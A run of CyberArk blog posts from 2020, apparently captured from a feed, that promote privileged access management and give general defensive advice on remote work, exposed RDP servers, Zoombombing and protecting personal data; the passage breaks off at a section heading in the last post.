A successful PAM program goes beyond just implementing a good product — it takes strategic planning across people, process and technology.  And we’re here to help. In this session, you’ll learn about selecting a PAM solution that provides security, availability and privacy.

Our “Friday 15” series makes it quick and easy for you to gain the must-have knowledge and information needed to successfully adopt or mature your PAM program. Just 15 minutes each Friday and you’re on your way!

 

]]>
Native, Interactive Login Aids Privileged Session Management https://www.cyberark.com/blog/native-interactive-login-aids-privileged-session-management/ Thu, 21 May 2020 23:22:01 +0000 https://www.cyberark.com/?p=92237 Privileged Session Management

We recently explored how native session management can help organizations secure workflows and protect privileged access while giving users the flexibility to work with their favorite applications and tools. As companies search for tools that provide optimal security without sacrificing operational efficiency, we’ve gotten a lot of interest around this topic.

Specifically, security teams want to know how native session management capabilities can provide full session isolation and monitoring for privileged users like system administrators. These users have access to powerful privileged accounts used to manage Windows and Linux-based systems. Cyber attackers are targeting them in earnest to shortcut the pathway to critical corporate assets.

The brief demo video below illustrates how the interactive login in CyberArk Privileged Session Manager makes it even easier for administrators to utilize CyberArk’s native SSH and Windows session management capabilities. Designed to help organizations bolster both security and user productivity, this feature is available in the CyberArk Privileged Access Security Solution and CyberArk Privilege Cloud, our privileged access management as-a-service offering.

Administrators can natively connect to Windows and Linux target systems directly from their desktop. Users provide details for their target systems via a native user interface, then use a drop-down menu to select their preferred tools, such as our native RDP or SSH proxies. This eliminates the need to pre-configure clients with full account details, accelerating native access and making life easier for administrators.

The interactive login enables organizations to establish a secure control point to prevent credential exposure and isolate critical assets from end users with transparent connections to the Windows and Linux target systems required to keep the business running.

Now, let’s see it in action:

 

This native experience is a clear, simplified way to facilitate the adoption of privileged session management, a critical element of any strong privileged access management (PAM) program. And by streamlining the process of connecting to both Windows and Linux target systems, we’re helping organizations empower their privileged users with demonstrable efficiency and user experience benefits.

Learn more by downloading our datasheet or exploring key workflow examples.

 

]]>
Accelerated Cloud Adoption Drives Security-as-a-Service https://www.cyberark.com/blog/cloud-opportunities-drive-security-as-a-service-adoption/ Thu, 14 May 2020 13:00:59 +0000 https://www.cyberark.com/?p=91319

The power of human connection has been highlighted during this dramatic shift in the way we live and work. From afar, families are sharing stories and laughter via video chats, co-workers are holding virtual happy hours, teachers are engaging students through remote learning and authors are leading online book clubs. Many of these important personal connections are made possible by the cloud.

The same is true for business. To quote the New York Times, “Cloud computing has become essential to home workers.” Within days of stay at home orders around the world, organizations were up and running on cloud-based applications that rapidly enabled collaboration, communication and productivity for millions of remote workers. And, behind these tools, public cloud providers like AWS, Microsoft Azure and Google Cloud rose to the herculean task of scaling by magnitudes to drive continuity and reliability.

While this moment in time may have fast-tracked many organizations’ plans to move workloads to the cloud – it also showed us what’s possible.  A new Instinet study reveals cloud services will become an even higher priority for 68% of CIOs.  As organizations and their employees consider a future in which remote team structures are the new norm, cloud migration is increasing by the day.

Meanwhile, The Wall Street Journal reports that since employees began remote work, some software providers running on major cloud platforms are seeing a “noticeable increase in interest in their products.” And it makes sense. Cloud-based software, or software-as-a-service (SaaS) applications – from business critical applications like ERP and CRM systems to collaboration tools like Zoom and Dropbox – can help organizations increase agility, empower employees and manage spending during uncertainty.

As-a-Service: Security’s New Normal

This accelerated journey to the cloud is also driving a parallel demand for scalable “as-a-service” security solutions that can protect remote workforces from cyber attacks, secure cloud workloads and mitigate the risk of damaging data breaches.

More than ever, organizations are looking for proven tools that:

  • Can be deployed quickly and easily
  • Offload availability and performance responsibilities from hard-working IT and security teams, while bridging the widening cybersecurity skills gap
  • Reduce up-front costs and flexibly scale as needs change over time
  • Empower remote workers to do their jobs without slowing them down
  • Achieve rapid time to value

Industry experts agree: companies that can extend their traditional security offerings to security-as-a-service (SecaaS) models delivering these benefits will be better positioned for the new normal.

 Prioritize Privilege. Meet the Demands of the New Norm and the Cloud Threat Landscape.

Organizations clearly understand the need for strong cybersecurity and are quickly realizing the benefits of security-as-a-service. But, as companies migrate to the cloud, the attack surface also expands. This has led to a surge in cyber attacks and many companies are struggling to prioritize projects and tools that can best protect their people and business.

Sometimes, the best way to make those decisions is to think like a cyber attacker. Consider: If you were an external attacker or malicious insider looking to steal sensitive data, launch ransomware or use your infrastructure for illicit cryptomining, what would you do first?

If you’re like most cyber criminals out there, you’d go straight for the privileged accounts, credentials and secrets which would quickly allow you to gain access to an organization’s most valuable and sensitive information like intellectual property and PII. And it’s pretty easy for attackers to find them, since privileges exist everywhere.

Privileged access management (PAM) as-a-service solutions can help organizations fast-track risk reduction by implementing strong controls around their most sensitive assets. While the benefits of SaaS are appealing, organizations are also looking for PAM tools that tackle privileged access protection across the entire infrastructure – not just in cloud applications. This requires a consistent, integrated approach to securing, managing and monitoring privileged access wherever it exists. Ultimately, security teams need to apply the same policies used for on-premises applications and infrastructure to the cloud.

Whether you’re onboarding new cloud apps, working to secure your remote workforce or extending controls to new areas, PAM as-a-service can help you mitigate risk quickly and prioritize the ever-evolving needs of your business. Learn more about PAM-as-a-Service today.

 

]]>
The Time is Now: CyberArk Acquires Idaptive https://www.cyberark.com/blog/the-time-is-now-cyberark-acquires-idaptive/ Wed, 13 May 2020 10:49:22 +0000 https://www.cyberark.com/?p=91001

Today we announced the acquisition of Idaptive, a leading Santa Clara, California-based Identity as a Service (IDaaS) company. Bringing together the technology and expertise of CyberArk and Idaptive we are setting out to deliver on SaaS innovation with the industry’s only modern identity platform with a security-first approach. This is an exciting day for our team, so I sat down with CyberArk Chairman and CEO Udi Mokady to get his thoughts on the news.

Tell us a bit more about Idaptive. 

Idaptive has a great team who is passionate about delivering innovative solutions to better protect their customers. Idaptive’s portfolio – which includes Single Sign-On (SSO), Multi-Factor Authentication (MFA) and identity lifecycle management — starts with a Zero Trust model and utilizes powerful Artificial Intelligence (AI) to secure access to applications and endpoints through user verification, device validation and intelligently limiting access. The company has been recognized as a leader by the most prominent industry analyst firms and its solutions are trusted by approximately 500 well-known organizations across industries.

Why is this acquisition particularly meaningful now? 

We believe that a traditional approach to managing identities and access is often not enough to prevent unauthorized activity. Users of all types – whether that be human, application or machine identities — are often provisioned with some form of privileged access. If not properly secured, these accounts create pathways for threat actors to execute increasingly targeted attacks and ultimately compromise an organization’s most critical systems and assets.

The time is now. This new reality requires a new kind of Identity Security platform – and together with Idaptive, we are answering that call. 

How do you see Idaptive strengthening the CyberArk portfolio?

Together, CyberArk and Idaptive will offer customers a SaaS-delivered, AI-based, security-first approach to managing identities and reducing risk. This approach is differentiated by putting Privileged Access Management at its core, is adaptive, context-aware and architected with the principles of Zero Trust and least privilege.

This will extend our ability to manage and protect identities with various levels of privileges across hybrid and multi-cloud environments, enabling customers to improve their overall security posture, simplify operations, support business agility and address ever increasing and complex regulatory requirements.

What makes you most excited about Idaptive?

Of course, I am excited about how Idaptive is going to help us drive additional value for our customers and partners, but beyond that, Idaptive also brings with it an amazing and passionate team.  I am eager to bring their energy and commitment to define the future of Identity Security.

From day one, we’ve been committed to helping our customers improve their overall security posture and supporting the ability for our partners to grow and expand their business.  Merging the innovative technology and talents of the Idaptive team with that of CyberArk represents an exciting opportunity to deliver a differentiated, modern approach as we work to continually meet the ever-changing needs of the dynamic threat landscape.

For more information on the acquisition of Idaptive, please check out our website which includes today’s announcement.

]]>
4 Ways Privileged Access Management Secures Remote Workers https://www.cyberark.com/blog/four-ways-privileged-access-management-secures-remote-workers/ Tue, 12 May 2020 13:00:03 +0000 https://www.cyberark.com/?p=90719 Privileged Access Management (PAM)

Employees around the world are working hard to remain productive, but, as the mantra taking hold of the internet goes, “People are not working from home; they are at home during a crisis trying to work.” They are following 24/7 news. They are juggling a multitude of family obligations. They’re using personal devices and insecure home networks for both work and play. They are stressed and distracted. And, unfortunately, that means they are likely your organization’s weakest security link right now – especially those users requiring privileged access.

Privileged access is the gateway to an organization’s most valuable assets and is at the core of nearly every major data breach. One of the fastest, most effective ways to reduce risk across your remote workforce is to prioritize privileged access management (PAM).

For many employees, as they moved from the office to working out of their homes, their privileges changed to allow them to work more independently or handle new tasks. Without a strong plan for privileged access management in a time of crisis, it’s very easy for these new privileges to become new vulnerabilities for the company.

In a time of unprecedented change in the way we work, global economic uncertainty and relentless cyber threats, privileged access management matters today more than ever – here’s why:

  1. Protecting Against the Rising Insider Threat

We are all human and no one is perfect.  We all make mistakes – especially when it comes to security.  We save passwords in browsers, download unsanctioned apps or share sensitive files via collaboration tools.  While not malicious in and of itself, these activities can unintentionally put data and systems at risk.

Attackers are banking on current chaos, targeting employees, contractors and other “trusted insiders” with a barrage of phishing and social engineering attacks. Successfully deceiving just one user is enough to kick-off a full system compromise.  Starting with getting access to an endpoint, an attacker can establish a foothold inside the organization, escalate privileges and masquerade as a privileged insider. If the compromised user already has privileged access to business critical systems, sysadmins, RPA administrators, IT help desk team members or executives, the attacker has hit the jackpot.

While most insider threats are accidental, times of significant change can also fuel malicious insider attacks. If privileged access has not been properly managed, it’s easy for a disgruntled employee or financially motivated former contractor to use unrevoked credentials to legitimately bypass security measures.

Privileged access management solutions that offer insider threat protection allow organizations to give people only the necessary levels of access to do their jobs, helping to ensure activities occurring across the distributed network aren’t malicious and, if they are, enable security operations teams to take quick action.

  1. Securing Cloud Environments as Usage Skyrockets

While almost all organizations are moving toward the cloud, studies show 68% of companies are accelerating this journey to empower remote workers.  And this makes sense for a number of reasons.  Software-as-a-service (SaaS) solutions provide fast, streamlined ways for employees to connect and collaborate, store information and get their jobs done. Further, scalable SaaS tools are helpful to overworked IT teams, since they’re easy to deploy, cost-effective and eliminate infrastructure headaches. It’s a win-win for everyone.

But as organizations deploy cloud services in record number, many are doing so without fully considering the potential security risks. In fact, a recent CyberArk survey found that less than half of businesses have a PAM strategy in place for securing privileges in the cloud.

Yet, privileged credentials and secrets exist across cloud resources. And where privileges exist, attackers will be there, working to exploit them. In the rush to get new or expanded cloud environments up and running, security teams cannot afford to double back and fix issues after cloud services are deployed.

A strong PAM strategy accounts for everywhere privileges live – from SaaS applications, cloud management consoles, custom-built applications and cloud infrastructure to endpoints and on-premises environments. This gives organizations a comprehensive view of privilege-related risk and drives efficiency through an integrated approach.

  1. Securing Employee Endpoints

With the rise in remote work, securing employee workstations is more important than ever. But with employees working from home offices with insecure “BYOD” devices on insecure home networks – and making little distinction between work and personal use – this can be easier said than done. After all, a remote worker on their home computer isn’t restricted in what they can download or where they can go – even if that leads them to accidentally execute malicious software while playing browser games.

Unfortunately, many companies are creating similar situations on their employee workstations as well. Giving remote workers local admin rights allow them to download and install programs, connect and install devices and access corporate systems and information without having to go through IT or security teams – all of which are the exact same privileges that make BYOD risky.

Furthermore, those local admin rights are extremely useful for cyber attackers looking to escalate privileges, making the remote workers higher value targets.

Privilege management – as part of a broader defense in depth strategy for endpoints – is essential for containing cyber attacks early in their lifecycle. PAM enables organizations to efficiently remove and manage local admin rights and enforce least privilege, provide flexible just-in-time access and enforce application control to keep remote workers productive and secure.

  1. Securing Supply Chains in the Face of Rising Risk

This time of change and disruption extends beyond your remote workforce, impacting every third party vendor, contractor, consultant and service provider in your supply chain.

In fact, 90% of organizations provide third party vendors privileged access critical internal systems to manage data, patch or upgrade systems and more.  Yet, these users are not managed by the organization, which makes it difficult to secure and control. Making matters worse, many of these third party vendors are also working remotely from disparate locations increasing the risk.

Traditionally, organizations have relied on VPNs and other legacy solutions to provide access.  On top of not being able provide the granular permissions required to properly secure this level of access, VPNs also require agents and passwords which can add more work for the already overburdened IT operations teams – and can slow users down. Innovations in PAM technology are helping organizations overcome these challenges by authenticating vendor users with biometrics and multifactor authentication (MFA). These approaches help organizations remove operational overhead, keep vendor workflows intact and improve overall cybersecurity.

Prioritizing Privileged Access Management Today

As we look toward the future of our “new normal” – which will likely include more permanent remote workers across organizations and their supply chains and the onboarding and maintenance of new applications and services– privileged access management is key to preventing costly security breaches in the future caused by lax security measures in the here and now.

Cyber attackers are persistent and prepared for the “long game” and security professionals need to have the same persistence.  Implementing a modern and comprehensive PAM strategy is a great place to start.

Secure your success in this new normal; find out more about and privileged access management and securing workstations and remote access.

]]>
KuppingerCole Analysts Name CyberArk “the One to Beat” in Privileged Access Management https://www.cyberark.com/blog/kuppingercole-analysts-name-cyberark-the-one-to-beat-in-privileged-access-management/ Fri, 08 May 2020 13:40:47 +0000 https://www.cyberark.com/?p=90502 Privileged Access Management Leadership Compass

Today, independent analyst firm KuppingerCole Analysts released its 2020 “Leadership Compass: Privileged Access Management” report, naming CyberArk the Overall Leader. CyberArk has held this leadership position for five consecutive years in recognition of its consistent, demonstrated advantages over the other vendors evaluated for this report.

This Leadership Compass comes at an important time. With security teams and Identity and Access Management (IAM) leaders facing immediate challenges related to business continuity and enabling remote work, it’s important to consider the broader organizational implications of our “new normal.”

The sudden, but necessary, transformation of global workforces has dramatically expanded the corporate privilege-related attack surface. Previously unmanaged devices are connecting to networks, while a broad range of users, including IT administrators, developers and business users, require remote access.

Many of these users require privileged access to corporate resources to maintain critical activities like payroll, product development and testing, security ops and customer support.  Few companies have ever had to perform these operations in a continuous, remote setting.

These new workflows are unfortunately accompanied by a rapidly growing list of vulnerabilities that impact organizations. From exploitable vulnerabilities in communications and collaboration tools like Zoom and Microsoft Teams, to insecure VPNs and even the broad use of unsecured home WiFi networks. Attackers are well aware of the opportunities the crisis has created for them and are dramatically increasing the pace of their attacks accordingly.

Bottom line? The new remote workforce has resulted in the users of privileged accounts becoming more numerous and widespread than ever before, while the pathways to steal and exploit these powerful accounts have grown and become easier to exploit.

According to analyst Paul Fisher, senior analyst at KuppingerCole Analysts, privileged access management has become one of the fastest growing areas of cyber security and risk management solutions. And that was before our world was turned upside down by COVID-19.  Now, the need for privileged access management is greater than ever and CyberArk is best positioned to help our customers prepare for what’s next.

With continued investments in innovation across the CyberArk Privileged Access Security Solution, CyberArk delivers the most comprehensive offerings for modern infrastructure that enable business, reduce risk and improve operational efficiency.

According to KuppingerCole Analysts, CyberArk “has a commanding position in the market and remains the one to beat.” Want to work with the Leader? Download a complimentary copy of the 2020 KuppingerCole Privileged Access Management Leadership Compass report now.

To learn more about what sets CyberArk apart, visit here.

]]>
Reduce Risk with CyberArk and Rapid7 Integrations https://www.cyberark.com/blog/reduce-risk-with-cyberark-and-rapid7-integrations/ Tue, 05 May 2020 21:50:51 +0000 https://www.cyberark.com/?p=90491

It’s well-known in the world of cybersecurity that you can’t secure what you don’t know exists. With today’s evolving threat landscape, it’s never been more of a challenge or a necessity to be able to discover and manage all of the accounts and credentials used by administrators and applications to access critical applications, systems and data.

While no solitary solution can address every security threat, CyberArk and Rapid7 have been working together to make life much easier and more secure for organizations working to reduce risk in a dynamically changing world.  There are a number of out-of-the-box integrations between CyberArk and Rapid7 that can help organizations both reduce risk and ease the burden on operations teams.

1. Identify Unknown Assets. Using Rapid7’s Project Sonar, organizations can identify previously unknown assets associated with their domain names and public IP address ranges that are exposed to the public internet. Sonar scans interact with exposed endpoint services, collecting additional metadata such as SSL certificates, HTML links in HTTP responses, service banners and more.

Any DNS records found in the endpoint metadata are then resolved (along with records from domain registrars) to help ensure complete discovery. These newly discovered assets can be audited against CyberArk in order to prioritize endpoints that require privileged access and get those accounts and credentials onboarded to minimize risk.

2. Run Secure Vulnerability Assessments. With CyberArk and Rapid7 InsightVM, Rapid7’s vulnerability assessment solution, organizations can reliably and thoroughly collect data across the ecosystem, while InsightVM securely retrieves a randomized and secured credential directly from CyberArk’s encrypted repository.

CyberArk checks that InsightVM is authenticated before granting a key to access systems and scan the environment. Policies can be set to rotate the credentials automatically. Unearth assets throughout the environment with InsightVM and then apply account templates to normalize the data and input it into the CyberArk digital vault for management.

As an additional layer of security, after InsightVM performs a scan, each system is designated a risk score, which is calculated based on defined vulnerabilities, asset tags, PCI compliance and others. InsightVM checks back with CyberArk so that only appropriate technicians are able to access higher risk assets to prevent further exposure to vulnerable systems, which can lead to dangerous lateral movement.

3. Unify security data and detect potential misuse or anomalous activities. The integration of CyberArk with InsightIDR, Rapid7’s SIEM tool, is a popular way to raise awareness of potential risk and enable security teams to quickly take action.

CyberArk is able to query the active directory, network traffic and more, and continuously monitor privileged credentials and session activities. Because of this, it can send logs and alerts over to InsightIDR where it uses cloud-based log and event management and machine learning to provide a baseline for user behavior and alert the Security Operations Center of potential misuse.

Together, CyberArk and Rapid7 cover the full circle from discovery to remediation. Furthermore, both solutions can be deployed “as a service,” which helps organizations minimize the on-premises footprint and enables security and IT teams to minimize risk and avoid overwork.

Right now, with IT budgets suddenly called into focus and security teams asked to make do with the tools at their disposal, organizations need solutions that can raise awareness and reduce the attack surface while being operation-friendly and not requiring a complex set of integrations and implementations. CyberArk and Rapid7 provide just that.

Join us for a webinar on May 14 where we’ll cover in-depth the many ways in which CyberArk and Rapid7 work together to help your organization reduce risk.

]]>
FBI Warns of Major Spike in Cyber Attacks https://www.cyberark.com/blog/fbi-warns-of-major-spike-in-cyber-attacks/ Thu, 30 Apr 2020 13:00:47 +0000 https://www.cyberark.com/?p=90152

Domestic cyber criminals and nation-state attackers alike are capitalizing on this time of uncertainty – and remote workers are a prime target.

Tonya Ugoretz, deputy Assistant Director of the FBI Cyber Division, recently spoke at a virtual Aspen Institute event. Ugoretz described the situation best as a “collision of highly motivated cyber threat actors and an increase in opportunities.” In fact, the FBI’s Internet Crime Complaint Center (IC3) is currently receiving between 3,000 and 4,000 cybersecurity complaints daily – a massive jump from their normal average of 1,000.

Criminals are taking advantage of “enormously high public interest in information” on COVID-19, the status of government stimulus checks and updates on local community restrictions. Some are setting up fake domains claiming to sell personal protective equipment, masquerading as charities working to raise money for patients or offering fraudulent loans to the financially strained. Times like these present a lucrative opportunity for cyber criminals – and they know it.

A Common Attack Method Shines

Traditional phishing attack methods continue to be a popular first step in the cyber attack chain. With a legitimate-looking email disguising a malicious, virus-spreading link or attachment, the attacker can easily cast their bait.  These attacks have come to present an increased threat to businesses – especially now.

In today’s environment, remote workers are increasingly using both personal and corporate devices to access corporate resources. While a company may have made the office computer as secure as it can, if the remote worker logs on with their home laptop, that doesn’t help. Even employer-owned devices may be more vulnerable at home as many workers will be connecting through unsecured Wi-Fi.

Furthermore, with the adjustment to working from home – whether that means setting up a laptop on the kitchen table or working with kids playing in the background – many newly remote workers are not at their most alert, which makes it easy for them to mistakenly click on the wrong link. Clicking on a phishing link gives the cyber attacker a foothold on that person’s workstation – from there they can gain access the company network to accomplish their goals.

Who’s at Risk?

While there are plenty of nefarious individuals working to cash in on chaos for personal profit, many of today’s campaigns are driven by highly organized nation-state attackers with deep pockets. To help shine a light on some of their methods, the FBI and a group of federal agencies issued a public alert this month – noting that financial institutions and digital currency exchanges are particularly at risk as attackers develop and launch “increasingly sophisticated” malware tools in search of large payouts.

The FBI has also observed a spike in nation-state cryptojacking attacks where attackers compromise victim endpoints and steal computing resources to mine digital currency. Additionally, they warned of ransomware campaigns, some of which demand payment “under the guise of long-term paid consulting arrangements in order to ensure that no such future malicious cyber activity takes place.”

But the financial sector isn’t the only one at risk. Hospitals and healthcare organizations are “deeply under attack,” explained Ugoretz and her co-presenters. As evidenced by attacks on the World Health Organization (WHO), nation-states are particularly interested in gaining insights on the coronavirus to help inform their country’s own response. These attackers are also honing in on research institutions and biotechnology companies that have publicly touted their work in progressing treatments and a viable vaccine.

Prioritizing the Protection of Privileged Access

Whether targeting healthcare organizations, financial institutions or any number of other companies, there is one common thread. Attackers are looking for sensitive information they can exploit – and they are doing so by compromising endpoints, stealing credentials and escalating privileges in order to access their targets.

While attackers can ultimately accomplish their goals by targeting any endpoint, they often seek out those of privileged users (like system administrators working from home) who have access to sensitive assets and powerful systems. By stealing privileged credentials from these users, attackers can accelerate their efforts. After gaining legitimate access to company systems, attackers appear to be company employees and can move throughout the environment with ease to conduct reconnaissance and siphon off proprietary data.

Privileged access is the gateway to an organization’s most valuable assets and is at the core of nearly every major security breach today. With privileged access, motivated external attackers and malicious insiders alike can access network infrastructure and steal data. Without that access, attackers are severely limited in what they can accomplish.

That’s why protecting the pathway to critical resources with privileged access management (PAM) is so important. Organizations that have a strategy in place to manage and monitor privileged access, as well as detect and respond quickly to threats, are best positioned to defend against today’s targeted threats.

While there is no silver bullet to protect organizations from this surge in criminal activity, prioritizing privilege can dramatically reduce the business impact of an attack.

Interested in learning more about privileged access management? Check out this datasheet or join us for a demo.

]]>
Attackers on the Hunt for Exposed RDP Servers https://www.cyberark.com/blog/attackers-on-the-hunt-for-exposed-rdp-servers/ Tue, 28 Apr 2020 13:00:38 +0000 https://www.cyberark.com/?p=90094 Privileged Access Management and Remote Desktop Protocol (RDP)

From the onset of the Covid-19 outbreak until the end of March, Shodan (a global search engine that scans and indexes internet-connected devices) tracked a 41% spike in Remote Desktop Protocol (RDP) usage. This makes sense since RDP is a popular way for users to access Windows machines and servers remotely over their VPN connections.

Organizations have ramped up RDP use to enable their remote workforce and maintain business operations during this time of uncertainty. Yet, while RDP is more secure than remote connection tools that do not encrypt entire sessions, two critical RDP vulnerabilities disclosed in the past year – BlueKeep and DejaBlue – highlight potential security risks. (You can learn more about these in this Threat Research blog).

In a recent SANS Technology Institute podcast, Dean of Research Johannes B. Ullrich, Ph.D. reported a sharp increase in exposed RDP servers (between 20-30%) and connected this surge to the number of system administrators now working from home. These “power users” have privileged access and are now managing servers from remote locations.

Cyber attackers have taken advantage of sysadmins working remotely and are dedicating more resources to scanning for the standard RDP port 3389 to see what has been exposed. They’ve also launched a wave of brute-force attacks using automation tools to systematically test username and credential combinations until they crack the code.

In a story told time and time again, once attackers gain an administrator’s privileged credentials, they can move laterally through the environment, escalating privileges until they reach valuable targets like the domain controller or cloud console. This access allows them to control any server, controller, endpoint or piece of data anywhere on a network. They can run commands, disable antivirus software, install malware, encrypt data for ransom or steal valuable data, including PII.

Fortunately, there are a few steps organizations can take to improve RDP security and reduce the risk of a data breach:

  1. Limit Privileged Access. By default, all administrators can log into RDP. Implement the principle of least privilege by limiting administrative privileges to only those who absolutely need it. Even better, layer in and enable just-in-time provisioning for remote vendors who are not part of the directory service so that their access is time-limited. Be sure to monitor and track all user access and activity during privileged sessions, especially for Tier0 assets like domain controllers or cloud consoles.
  2. Keep software up-to-date on all remote Windows machines connecting to the internet – including Windows 7 workstations.
  3. Enable NLA. Network level authentication (NLA) provides an extra level of authentication before a connection is established.
  4. Avoid Exposure. Keep RDP servers behind your firewall. Never allow direct RDP connections that expose machines and servers to the internet, which can put your critical data and internal systems at risk.
  5. Use Strong Passwords and Multifactor Authentication. Brute force tools are getting sophisticated. Strong password policies must be followed – and multi-factor authentication is a must. Even better, consider tools that eliminate passwords and other network-based access controls altogether.

Privileged Access Management (PAM) tools like the CyberArk Privileged Access Security Solution help organizations establish a secure RDP connection from the start. Privileged credentials are centrally stored and managed in a digital vault and access is granted according to user permissions. The web browser session is isolated and encrypted. Privileged user activity is tightly monitored and controlled, and suspicious activity is flagged so SOC teams can respond immediately.

Meanwhile, remote workers can use native workflows that don’t expose their endpoints to the credentials needed to access critical IT systems for work, maintenance or otherwise. Best of all, these strong PAM controls extend beyond RDP to help organizations secure remote connections to any web-facing system, like SSH authentication to Unix/Linux.

Interested in learning more? Register for our April 28 webinar Privileged Access 101: Changing Your Security Game or watch it on demand anytime.

]]>
Friction-Free Experience vs Secure Access: Lessons From the “Zoombombing” Fallout https://www.cyberark.com/blog/friction-free-experience-vs-secure-access-lessons-from-the-zoombombing-fallout/ Fri, 24 Apr 2020 18:05:55 +0000 https://www.cyberark.com/?p=99515

The controversy and fallout resulting from the widespread reporting of bad actors gaining access to Zoom meetings is just another example of the constant struggle faced by developers and designers of how to balance a friction-free experience and ensuring secure access and privacy.

In the last few weeks, everyone has become familiar with “Zoombombing” — when  uninvited guests show up in your Zoom video meetings with the sole intention of disrupting them, whether the purpose of the meeting is business, education or a virtual gathering of friends. There have been reports of hackers shouting angry and violent comments, and some sharing lewd videos and images. With the world struggling to adapt to a new reality — which, for many, involves working from home for an extended period for the first time in their professional lives – the last thing anyone needs are additional headaches piled on by malicious individuals simply because they can.

The challenge stems from the fact that Zoom meetings have default settings geared toward user convenience and a frictionless experience — rather than security and privacy. Hackers are able to guess at Zoom URLs and gain access with minimal barriers in their way. There are security measures in place within Zoom, but they aren’t enabled by default and most users aren’t even aware they can do things such as setting a meeting password, click the box that doesn’t allow anyone to enter before the host, or an option that places all new guests in a virtual waiting room before they are approved by the host. Additionally, with Zoom going from a primarily office-based system to a global social outlet practically overnight, these outcomes were exacerbated.

Zoom CEO Eric Yuan immediately issued an apology and said the company was working fast to address the concerns. His choice of words in his response was particularly significant. While acknowledging that default security measures were overlooked, he also said Zoom’s “intentions are good.” It is worth noting that this isn’t the company’s first run-in with security problems — Zoom stirred up controversy with a macOS auto-installer that bypassed typical user interactions to make the install experience more seamless than most other software. These choices, and this “Zoombombing” situation highlights an issue that is a much bigger industry challenge, and has been for a long time.

UX vs. Security

Steve Jobs made Apple into the most valuable company in the world with the ability to surprise and delight customers. The goal of productivity applications like Zoom is to surprise and delight users with an unexpectedly seamless and easy end-user experience. Users flock to a convenient and frictionless user experience which in turn often leads to mass adoption. In the race to make things seamless for people, there is a constant tension between limiting “friction” -— how many steps it takes to gain access to an application — and enforcing security. It is interesting to note that Zoom was founded by Yuan and other former WebEx engineers with the express intention of creating a more user-friendly video conferencing experience. It wasn’t that they weren’t aware of the potential security issues, it was that they made a conscious choice to weigh things more heavily on the side of a great UX.

So when Yuan says their “intentions are good” he’s right. Zoom had good intentions to improve the user experience, but the results were going to be inevitably unbalanced. It wasn’t that they were caught unaware during the “Zoombombing” phenomenon, it was just that the practice exploited the seams where Zoom opted for convenience and accessibility over stringent security and at a time when the platform was experiencing a surge in use among individuals rather than businesses. They are far from alone in this – in fact, it’s a constant struggle for most interface design. Driving innovation sometimes means sacrificing either the user experience or security. Neither is a preferred choice, but it’s a choice that must be made.

Striking the Right Balance

Fortunately, trying to find some balance between frictionless access and security is exactly what we at Idaptive do in our quest to provide organizations with Identity and Access Management solutions. As our CEO Danny Kibel writes, there are “two extremes” when it comes to security. “On one end, you can unplug everything from the internet, while constantly requiring physical and digital verification. That’s maximum security, but it’s also maximum inconvenience. On the other side, you can create a totally frictionless user experience, but leave your employees and systems completely exposed to malicious actors.” Zoom — and others – felt strongly that they should bet on the intended users first, and hope that the malicious actors would be minimal.

We see concepts like biometrics, behavioral, and other contextual data as being key to finding some sort of balance. We envision a “Zero Trust,” password-less future where applications are able to consider a multitude of factors to recognize authorized users and identify risk — not with simple passwords, but with device usage tendencies, location, past behavior, and even typing particularities. The applications “know” you and can understand what is abnormal or suspicious without having to add newer and more stringent gates between the user and the application.

While the headlines were quick to paint Zoom as being caught with their proverbial pants down over “Zoombombing,” the truth is that the company set out with a clear and positive objective — and succeeded enormously — but had to make tough choices along the way. Not even five years ago, users (especially in the US) greatly valued convenience over privacy/security. But since the last US presidential election, the winds have dramatically shifted (likely sparked by the Cambridge Analytica/Facebook scandal and Russian election interference). Zoom didn’t shift with the times and what was their greatest strength — ease of use — has become their unexpected Achilles heel.

No one anticipated a global pandemic forcing hundreds of millions to suddenly have to figure out how to work or run classrooms from home. Unfortunately, times of chaos sometimes open doors for the opportunistic. What we have here is a lesson for all developers moving forward. We need to bridge the gap between user experience and security. Perhaps being forced into it by unforeseen and extenuating circumstances will give us the impetus for giant leaps forward. Now if you will excuse me, I am late for my Zoom meeting…

]]>
How Privileged Access Management Can Protect PII https://www.cyberark.com/blog/how-privileged-access-management-can-protect-pii/ Fri, 24 Apr 2020 13:26:30 +0000 https://www.cyberark.com/?p=89730 Personally Identifiable Information

The data protection lessons learned over the last 10 years have underscored the importance of protecting personally identifiable information (PII) time and time again. Nearly 4 billion records have been lost across the 15 largest data breaches in history — 10 of which occurred in the last decade. When these breaches happen, businesses face more than just a hit to their brand reputation – they can also translate to fines and penalties equaling millions or even billions of dollars.

Because the security of PII continues to grow in complexity, governments are continuously extending the rights of individuals to better control and protect the use of their personal data. In the European Union, enforcement of the General Data Protection Regulation (GPDR), began in May 2018 to regulate on data protection and privacy.

Meanwhile, in the United States, a bill meant to impose penalties for cybersecurity breaches that put sensitive consumer data at risk, the Data Breach Prevention and Compensation Act is winding its way through congress and several states already have their own security data breach laws similar to GDPR.

The recent New York law, Stop Hacks and Improve Electronic Data Security Act (SHIELD Act), which was implemented to broaden data security and breach notification requirements, expanded the definition of the types of private information to be protected. For example, SHIELD added data elements or a combination of data elements that would grant access to someone’s PII to the types of protected information.

Furthermore, email addresses, email passwords and biometric information (digital copies of fingerprints, voice prints, retina scans or any other digital representation of biometric data) fall under the expanded definition of the types of private information under the SHIELD Act.

As more privacy laws continue to be enacted throughout the world, it is clear that companies now have a legal obligation to protect consumer data, and with fines up to as much as 4% of annual global revenue (in the case of GDPR), it is an obligation that no company can afford to ignore.  The National Institute for Standards and Technology (NIST) suggests that PII should be protected through a combination of measures including operational safeguards, privacy-specific safeguards and security controls aligned to a risk-based approach.

Privileged access management has a key role to play in protecting PII.  Here’s how:

Access Enforcement and Separation of Duties

Organizations should control access to PII through policies and access enforcement mechanisms. One of the ways this can be done is by managing privileged credential policies across the entire IT environment, isolating sessions through a highly secured proxy and implementing role-based access control to help ensure that each user can only access the systems and data needed for their specific role.

Privileged access management solutions continuously scan the environment to detect privileged access, validate privilege by adding discovered accounts to a pending queue and automatically onboard and rotate accounts and credentials based on enterprise policy in a highly encrypted vault.

The use of a secure and fully-isolated proxy helps prevent the exposure of privileged credentials directly to the end users, their target applications or devices. This secure control point manages access to these privileged credentials and implements dual-control for a more robust workflow, providing users with customized approval workflows that ensure that they are in compliance and allowed to access the systems hosting PII – no matter the environment (cloud or hybrid).

User-Based Collaboration and Information Sharing

